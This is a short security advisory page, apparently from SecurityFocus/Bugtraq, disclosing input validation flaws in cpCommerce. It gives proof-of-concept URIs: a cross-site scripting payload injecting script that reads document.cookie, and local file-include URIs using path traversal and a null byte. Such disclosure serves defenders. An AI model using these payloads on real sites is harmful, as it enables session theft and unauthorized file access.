Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

cpCommerce Multiple Input Validation Vulnerabilities

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

For the cross-site scripting issue:
http://www.example.com/cpcommerce/calendar.php?obj=view.year&month=2&date=21&year=2008<script>alert(document.cookie)</script>

For the local file-include issues:
http://www.example.com/cpcommerce/?action=language&language=../To%20DO%20LIST.txt
http://www.example.com/cpcommerce/category.php?action=../To%20DO%20LIST.txt%00







 

Privacy Statement
Copyright 2009, SecurityFocus